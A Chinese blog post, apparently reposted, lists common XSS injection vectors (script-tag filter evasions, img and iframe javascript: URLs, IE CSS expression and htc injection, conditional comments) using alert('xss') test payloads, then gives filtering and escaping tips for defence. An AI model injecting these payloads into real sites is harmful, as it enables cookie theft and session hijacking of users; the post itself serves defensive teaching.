常见的XSS 注入攻击方式及预防

最新推荐文章于 2023-05-31 10:58:20 发布
最新推荐文章于 2023-05-31 10:58:20 发布
阅读量3.5k 收藏
点赞数

常见的XSS 注入攻击方式及预防

转自: http://hi.baidu.com/annexmicro/item/22713fe7e5cb12aac00d757d

前端开发常见的安全问题就是会遭受 XSS 注入攻击,这里列举常见的代码注入方式。

Javascript 代码注入
Javascript 代码注入主要表现为直接引用未经校验的字符串、解析不安全的 JSON 数据(包括 JSONP)等。

很多时候会写这样的代码

document.write('u name is' + name);
这就会形成一定的安全性问题(如果服务器端没有过滤的话),比如 name 为下面的数据,在没有经过过滤时

';alert('xss');//
";alert('xss');//
'';!--"<xss>=&{()}
就会破坏原有代码结构,插入不期望的代码。

HTML 标签注入
HTML 注入是较为常见的一种方式,主要的注入入口为不周全的正则过滤、内联样式(针对 Exploer),下面是常见的注入代码

逃过不周全的正则过滤,解决方案为使用 PHP 的 htmlspecialchars 以及 htmlentities 等类似函数转义。

<sCrIpT src=xss.js></sCrIpT>
<script src=xss.js>
</script>
<script/xss src="xss.js"></script>
<script/SRC="xss.js"></script>
<<script>alert("xss");//<</script>
<script>a=/xss/
alert(a.source)</script>
从图片标签中注入,在些论坛上比较常见

<img src="javascript:alert('xss');">
<img """><script>alert("xss")</script>">
<img src="xss.php?param">
从连接标签上注入(虽然本人没有发现过案例,不过也不能轻视)

<script a=">" SRC="xss.js"></script>
<script =">" SRC="xss.js"></script>
<script a=">" '' SRC="xss.js"></script>
其他容易注入的地方

<body οnlοad=alert('xss')>
<iframe src="javascript:alert('xss');"></iframe>
<embed src="xss.swf" AllowScriptAccess="always"></embed>
<meta http-equiv="Set-Cookie" content="USERID=<script>alert('xss')</script>">
先摘记举例那么多,下期的内容包括“CSS 注入”、“其他注入方法”以及一般性解决方案,欢迎探讨和纠正。

接上一期,这里主要考虑 CSS 注入的方式。CSS 注入主要为背景图注入和针对 Exploer 的 CSS Expression 注入。

考虑没有完全将样式过滤的情况,下面的代码即有可能成为攻击代码

<xss style="behavior: url(xss.htc);">
上面的是针对 Exploer 的 htc 注入,htc 可以认为是个脚本。

<div style="background-image: xss.jpg">
谁会知道 xss.jpg 是什么内容呢?不过很多站点统计代码也是使用了这一原理。

<div style="width: expression(alert('xss'));">
<img style="xss:expr/*xss*/ession(alert('xss'))">
exp/*<A style='noxss:noxss("*//*");xss:ex/*xss*//*/*/pression(alert("xss"))'>
针对 Exploer 的 Expression 要保持“淡定”,最好的做法就是过滤 style 属性。

如果没有将注释完全过滤充分,则又会在 Exploer 出现典型的注入漏洞

<!--[if gte IE 4]>
<script>alert('xss');</script>
<![endif]-->
安全性问题,这个时候我反而感谢 Exploer 提供那么多的“机会”。

-- Split --

那么如何预防 XSS 注入?主要还是需要在用户数据过滤方面得考虑周全,在这里不完全总结下几个 Tips

1. 假定所有的用户输入数据都是“邪恶”的 
2. 弱类型的脚本语言必须保证类型和期望的一致 
3. 考虑周全的正则表达式 
4. strip_tags、htmlspecialchars 这类函数很好用 
5. 外部的 Javascript 不一定就是可靠的 
6. 引号过滤必须要重点注意 
7. 除去不必要的 HTML 注释 
8. Exploer 求你放过我吧……
shyu1989
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
预防XSS攻击和SQL注入XssFilter
05-19
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被黑客用来编写危害性更大的网络钓鱼(Phishing)攻击而变得广为人知。对于跨站脚本攻击,黑客界共识是:跨站脚本攻击是新型的“缓冲区溢出攻击“,而JavaScript是新型的“ShellCode”。 二、XSS漏洞的危害 (1)网络钓鱼,包括盗取各类用户账号; (2)窃取用户cookies资料,从而获取用户隐私信息,或利用用户身份进一步对网站执行操作; (3)劫持用户(浏览器)会话,从而执行任意操作,例如进行非法转账、强制发表日志、发送电子邮件等; (4)强制弹出广告页面、刷流量等; (5)网页挂马; (6)进行恶意操作,例如任意篡改页面信息、删除文章等; (7)进行大量的客户端攻击,如DDoS攻击; (8)获取客户端信息,例如用户的浏览历史、真实IP、开放端口等; (9)控制受害者机器向其他网站发起攻击; (10)结合其他漏洞,如CSRF漏洞,实施进一步作恶; (11)提升用户权限,包括进一步渗透网站; (12)传播跨站脚本蠕虫等; 三、过滤器配置 web.xml配置 XssFilter com.xxx.Filter.XssFilter XssFilter /*
一个典型的XSS框架注入攻击的分析和预防.pdf
07-01
一个典型的XSS框架注入攻击的分析和预防.pdf
前端安全之XSS
2301_76694151的博客
04-26 345
XSS, 即为(Cross Site Scripting), 中文名为跨站脚本, 是发生在目标用户的浏览器层面上的,当渲染DOM树的过程成发生了不在预期内执行的JS代码时,就发生了XSS攻击。跨站脚本的重点不在‘跨站’上,而在于‘脚本’上。大多数XSS攻击的主要方式是嵌入一段远程或者第三方域上的JS代码。实际上是在目标网站的作用域下执行了这段js代码。
xss基础知识点
weixin_52776876的博客
07-27 2150
​跨站脚本攻击,英文全称CrossSiteScript.​xss攻击,通常指黑客通过"HTML注入"篡改了网页,插入了恶意的脚本.从而在用户浏览网页时,控制用户浏览器的一种攻击.
image xss 4.能发动xss攻击的图片的制作方法
microad_liy的专栏
09-01 6564
按照以下步骤,可以轻松制作出能发动xss攻击的.gif、.jpg图片。 1。制作原始图片  图1 这里为什么设置背景色? 为了图7处加入js脚本后,js脚本能够被执行的成功率更高。(js被加到图片的comment区域的机会更大) 图2
前端页面JS注入问题,前端XSS安全问题解决办法
热门推荐
41981DC的博客
09-24 3万+
在页面中增加 JS 校验,对特殊符号进行替换,防止用户输入恶意代码导致 JS 注入问题。 在 web 开发中,对用户输入的内容做校验是必不可少的环节,不管是通过正则表达式对用户的输入进行校验,还是通过对特殊符号进行转义,均可达到目的。通过正则表达式校验,可能会导致用户体验差一点(因为用户不能自由输入~~),本文通过对 特殊符号进行转义 的方法来演示。 示例 自定义添加角色,包括角色名称、角色...
XSS漏洞注入,分类,防御方法
Y22Lee的博客
04-06 2542
XSS全称(Cross Site Scripting)跨站脚本攻击,是最常见的Web应用程序安全漏洞之一,仅次于SQL注入XSS是指攻击者在网页中嵌入客户端脚本,通常是JavaScript编写的危险代码,当用户使用浏览器浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的。由此可知,XSS属于客户端攻击,受害者最终是用户,但特别要注意的是网站管理人员也属于用户之一。
正则表达式来去除文本中的标签结构,以防止xss攻击
m0_74826054的博客
12-10 1198
正则表达式来去除文本中的标签结构,以防止xss攻击
php xss 防御 img,PHP的防御XSS注入的终极解决方案【信息安全】【Hack】
weixin_33280038的博客
03-16 247
方法一,利用php htmlentities函数php防止XSS跨站脚本攻击的方法:是针对非法的HTML代码包括单双引号等,使用htmlspecialchars()函数 。在使用htmlspecialchars()函数的时候注意第二个参数, 直接用htmlspecialchars($string) 的话,第二个参数默认是ENT_COMPAT,函数默认只是转化双引号(“), 不对单引号(‘)做转义。...
常用正则表达式大全(Xss防范、sql注入、手机邮箱验证等等,持续补充~)
少说,多做
05-20 1万+
常用正则表达式大全 文章目录一、安全防范类1.SQL注入1.Xss拦截二、常用校验类1.手机号校验2.邮箱校验3.邮政编码校验4.IP地址校验使用示例 一、安全防范类 1.SQL注入 (\=.*\-\-)|(\w+(%|\$|#|&)\w+)|(.*\|\|.*)|(\s+(and|or)\s+)|(\b(select|update|union|and|or|delete|insert|trancate|char|into|substr|ascii|declare|exec|count|mast
一个典型的XSS框架注入攻击的分析和预防.zip
10-16
一个典型的XSS框架注入攻击的分析和预防
整理php防注入XSS攻击通用过滤
12-19
那么如何预防 XSS 注入?主要还是需要在用户数据过滤方面得考虑周全,在这里不完全总结下几个 Tips 1. 假定所有的用户输入数据都是“邪恶”的 2. 弱类型的脚本语言必须保证类型和期望的一致 3. 考虑周全的正则...
前端安全之防范XSS
高先生的猫
06-06 2690
由于前段时间业务有接触到富文本编辑器,且编辑器由用户直接使用,所以不可避免需要对其涉及到的XSS防护有所了解,因此对XSS防护做一个实战小结。 前言 XSS大部分前端coder都不会陌生,全称:跨站脚本漏洞(Cross Site Scripting,简写作XSS)是Web应用程序在将数据输出或者展示到网页的时候存在问题,导致攻击者可以将对网站的正常功能造成影响甚至窃取或篡改用户个人信息,其诱发的主要原因是没有针对用户输入来源的数据以及不可信数据源的过滤。本文将针对XSS进行简单的归类总结,并且提供.
【网络安全】防止XSS注入的方法
Xuetao_Shen的博客
03-22 2589
关于防止XSS注入: 1.尽量使用框架。通过对自己的网页进行xss保留型攻击的测试,尽管自己没有对某些输入框进入转义,但还是无法进行xss注入,因为框架会自动将某些特殊字符转义。(我使用的spring+struts+hibernate框架)。 2.如果不使用框架,一定要进行字符转义。对< 、> 、" 、 等字符进行转义成为:&lt; 、&gt; 、...
正则过滤payload,避免xss漏洞
qq_42215960的博客
08-21 395
正则过滤payload,避免xss漏洞 举例: 如果不做处理,可得到cookie信息,形成xss漏洞 正则: /<script[\s\S]*?</script>/ [\s\S]*? 任意多个字符(无限制)
xss攻击和sql注入正则
weixin_43863000的博客
03-18 1020
static function request_filter($data){ if(is_array($data)){ foreach($data as $key=>$v){ $data[$key] = self::request_filter($data[$key]); } }else{ if(strlen($data)){ $fil
SpringBoot——防止sql注入xss攻击
Blackcat_Hellcat的博客
11-22 1172
SpringBoot——防止sql注入xss攻击 sql注入:把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 解决方法: (1)无论是直接使用数据库还是使用如mybatis组件,使用sql的预编译,不要用拼接字符串; (2)后台过滤检测:使用正则表达式过滤传入的参数**;**.字符串过滤; (4)前端检测sql常见关键字,如or and drop之类的。 xss攻击:其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当其它用户浏
【web安全】XSS攻击(跨站脚本攻击)如何防范与实现
AA2534193348的博客
05-31 4462
XSS攻击(跨站脚本攻击)是一种常见的Web安全漏洞,攻击者在Web页面中插入恶意脚本代码,并在受害人访问该页面时执行脚本代码,从而获取用户敏感信息、操作受害人账号或篡改页面内容等不当行为。XSS攻击可以通过输入表单、搜索框、评论区等途径实现,因此对于Web开发人员来说,要采取相应的措施预防和修复XSS漏洞,以确保用户数据的安全。
多图表实现员工满意度调查数据分析python
最新发布
04-22
员工满意度是指员工对于工作环境、待遇、职业发展和组织管理等方面的满意程度。它是衡量员工对工作的整体感受和情绪状态的重要指标。
innerHTML xss攻击预防
06-10
为了防止innerHTML中的XSS攻击,你可以采取以下措施: 1. 使用textContent代替innerHTML,这样可以将所有的HTML标签都转换为文本内容,从而避免了XSS攻击。...这些措施可以帮助你有效地预防innerHTML中的XSS攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值